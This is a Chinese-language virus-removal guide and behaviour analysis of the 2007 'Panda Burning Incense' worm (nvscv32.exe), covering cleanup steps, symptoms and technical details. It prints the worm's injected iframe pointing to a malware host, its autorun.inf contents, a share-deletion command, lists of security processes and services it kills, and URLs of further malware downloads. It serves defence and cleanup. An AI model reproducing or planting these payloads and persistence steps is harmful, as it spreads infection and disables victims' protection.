一、PConline提供的解決方案

　　1.拔網線；

　　2.重新進入WinXP安全模式，熊貓燒香病毒進程沒有加載，可使用“任務管理器”?。ㄌ崾荆洪_機后按住F8）

　　3.刪除病毒文件：%SystemRoot%\system32\drivers\nvscv32.exe。

　　4.開始菜單=>運行，運行msconfig命令。在“系統(tǒng)配置實用程序”中，取消與nvscv32.exe相關的進程。也可使用超級兔子魔法設置、HijackThis等，刪除nvscv32.exe的注冊表啟動項。

取消熊貓燒香病毒進程的啟動

　　5.下載并使用江民專殺工具，修復被感染的exe文件。并及時打上Windows補丁。

　　6.清除html/asp/php等，所有網頁文件中如下代碼：（為防止傳播代碼有三處修改，請將“?！睋Q為“.”）

　　<iframe src=http://www。krvkr。com/worm。htm width=”0” height=”0”></iframe>

　　批量清除惡意代碼的方法：

• 　　可使用Dreamweaver的批量替換。

Dreamweaver批理替換的使用方法

• 　　可下載使用BatchTextReplacer批量替換。
• 　　部署了Symantec AntiVirus的企業(yè)，升級到最新病毒庫掃描全盤文件，即可清除被添加的惡意代碼和清除病毒文件。

　　7.用安裝殺毒軟件，并升級病毒庫，掃描整個硬盤，清除其他病毒文件。推薦PConline多次推薦的“免費卡巴斯基”——Active Virus Sheild。（xxxxxxxxxxxxx）（注：步驟7不能與步驟5調換，以免可修復的帶毒文件被刪除！）

　　8.刪除每個盤根目錄下的autorun.inf文件，利用搜索功能，將Desktop_.ini全部刪除。

二、互聯(lián)安全網提供的解決方法（后文的病毒描述、中毒現象和技術分析均來自互聯(lián)安全網）

　　1：關閉網絡共享，斷開網絡。

　　2：使用IceSword結束掉nvscv32.exe進程（速度要快，搶在病毒感染IceSword前）

　　3：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
　　Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的數值改為1

　　4：刪除注冊表啟動項

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

　　nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

　　5：刪除C:\WINDOWS\system32\drivers\nvscv32.exe

　　6：刪除每個盤根目錄下的autorun.inf文件和setup.exe文件，利用搜索功能，將Desktop_.ini全部刪除。

　　7：如果電腦上有腳本文件，將病毒代碼全部刪除。

　　8：關閉系統(tǒng)的自動播放功能。

　　這樣就基本上將病毒清除了。

三、病毒描述

　　含有病毒體的文件被運行后，病毒將自身拷貝至系統(tǒng)目錄，同時修改注冊表將自身設置為開機啟動項，并遍歷各個驅動器，將自身寫入磁盤根目錄下，增加一個 Autorun.inf文件，使得用戶打開該盤時激活病毒體。隨后病毒體開一個線程進行本地文件感染，并對局域網其他電腦進行掃描，同時開另外一個線程連接某網站下載木馬程序進行發(fā)動惡意攻擊。

　　文件名稱：nvscv32.exe
　　病毒名稱：目前各殺毒軟件無法查殺（已經將病毒樣本上報各殺毒廠商）
　　中文名稱：（尼姆亞，熊貓燒香）
　　病毒大?。?8,570 字節(jié)
　　編寫語言：Borland Delphi 6.0 - 7.0
　　加殼方式：FSG 2.0 -> bart/xt
　　發(fā)現時間：2007.1.16
　　危害等級：高

四、中毒現象

　　1：在系統(tǒng)每個分區(qū)根目錄下存在setup.exe和autorun.inf文件（A和B盤不感染）。

　　2：無法手工修改“文件夾選項”將隱藏文件顯示出來。

　　3：在每個感染后的文件夾中可見Desktop_ini的隱藏文件，內容為感染日期 如：2007-1-16

　　4：電腦上的所有腳本文件中加入以下代碼：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

　　5：中毒后的機器上常見的反病毒軟件及防火墻無法正常開啟及運行。

　　6：不能正常使用任務管理器，SREng.exe等工具。

　　7：無故的向外發(fā)包，連接局域網中其他機器。

五、技術分析

　　1：病毒文件運行后，將自身復制到%SystemRoot%\system32\drivers\nvscv32.exe

　　建立注冊表自啟動項：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\]

　　nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe"

　　2：查找反病毒窗體病毒結束相關進程：

• 　　天網防火墻
• 　　virusscan
• 　　symantec antivirus
• 　　system safety monitor
• 　　system repair engineer
• 　　wrapped gift killer
• 　　游戲木馬檢測大師
• 　　超級巡警

　　3：結束以下進程

• 　　mcshield.exe
• 　　vstskmgr.exe
• 　　naprdmgr.exe
• 　　updaterui.exe
• 　　tbmon.exe
• 　　scan32.exe
• 　　ravmond.exe
• 　　ccenter.exe
• 　　ravtask.exe
• 　　rav.exe
• 　　ravmon.exe
• 　　ravmond.exe
• 　　ravstub.exe
• 　　kvxp.kxp
• 　　kvmonxp.kxp
• 　　kvcenter.kxp
• 　　kvsrvxp.exe
• 　　kregex.exe
• 　　uihost.exe
• 　　trojdie.kxp
• 　　frogagent.exe
• 　　kvxp.kxp
• 　　kvmonxp.kxp
• 　　kvcenter.kxp
• 　　kvsrvxp.exe
• 　　kregex.exe
• 　　uihost.exe
• 　　trojdie.kxp
• 　　frogagent.exe
• 　　logo1_.exe
• 　　logo_1.exe
• 　　rundl132.exe
• 　　taskmgr.exe
• 　　msconfig.exe
• 　　regedit.exe
• 　　sreng.exe 

　　4：禁用下列服務

• 　　schedule
• 　　sharedaccess
• 　　rsccenter
• 　　rsravmon
• 　　rsccenter
• 　　kvwsc
• 　　kvsrvxp
• 　　kvwsc
• 　　kvsrvxp
• 　　kavsvc
• 　　avp
• 　　avp
• 　　kavsvc
• 　　mcafeeframework
• 　　mcshield
• 　　mctaskmanager
• 　　mcafeeframework
• 　　mcshield
• 　　mctaskmanager
• 　　navapsvc
• 　　wscsvc
• 　　kpfwsvc
• 　　sndsrvc
• 　　ccproxy
• 　　ccevtmgr
• 　　ccsetmgr
• 　　spbbcsvc
• 　　symantec core lc
• 　　npfmntor
• 　　mskservice
• 　　firesvc

　　5：刪除下列注冊表項：

• 　　software\microsoft\windows\currentversion\run\ravtask
• 　　software\microsoft\windows\currentversion\run\kvmonxp
• 　　software\microsoft\windows\currentversion\run\kav
• 　　software\microsoft\windows\currentversion\run\kavpersonal50
• 　　software\microsoft\windows\currentversion\run\mcafeeupdaterui
• 　　software\microsoft\windows\currentversion\run\network associates error reporting service
• 　　software\microsoft\windows\currentversion\run\shstatexe
• 　　software\microsoft\windows\currentversion\run\ylive.exe
• 　　software\microsoft\windows\currentversion\run\yassistse

　　6：感染所有可執(zhí)行文件，并將圖標改成（這次不是熊貓燒香那個圖標了）

　　7：跳過下列目錄:

• 　　windows
• 　　winnt
• 　　systemvolumeinformation
• 　　recycled
• 　　windowsnt
• 　　windowsupdate
• 　　windowsmediaplayer
• 　　outlookexpress
• 　　netmeeting
• 　　commonfiles
• 　　complusapplications
• 　　commonfiles
• 　　messenger
• 　　installshieldinstallationinformation
• 　　msn
• 　　microsoftfrontpage
• 　　moviemaker
• 　　msngaminzone

　　8：刪除*.gho備份文件。

　　9：在所有驅動器根目錄建立自身文件副本setup.exe,建立autorun.inf文件使病毒自動運行,設置文件屬性為隱藏、只讀、系統(tǒng)。

　　autorun.inf內容：

　　[AutoRun]
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shell\Auto\command=setup.exe

　　10：刪除共享：cmd.exe /c net share admin$ /del /y

　　11：在機器上所有腳本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代碼地址是一個利用MS-06014漏洞攻擊的網頁木馬，一旦用戶瀏覽中此病毒的服務器上的網頁，如果系統(tǒng)沒有打補丁，就會下載執(zhí)行此病毒。

　　12：掃描局域網機器，一旦發(fā)現漏洞，就迅速傳播。

　　13：在后臺訪問http：//www。whboy。net/update/wormcn。txt，根據下載列表下載其他病毒。

　　目前下載列表如下：（以下鏈接均為危險內容，請勿點擊！）

• 　　http://www.krvkr.com/down/cq.exe
• 　　http://www.krvkr.com/down/mh.exe
• 　　http://www.krvkr.com/down/my.exe
• 　　http://www.krvkr.com/down/wl.exe
• 　　http://www.krvkr.com/down/rx.exe
• 　　http://www.krvkr.com/down/wow.exe
• 　　http://www.krvkr.com/down/zt.exe
• 　　http://www.krvkr.com/down/wm.exe
• 　　http://www.krvkr.com/down/dj.exe
• 　　http://www.krvkr.com/cn/iechajian.exe

　　到此病毒行為分析完畢。

最新評論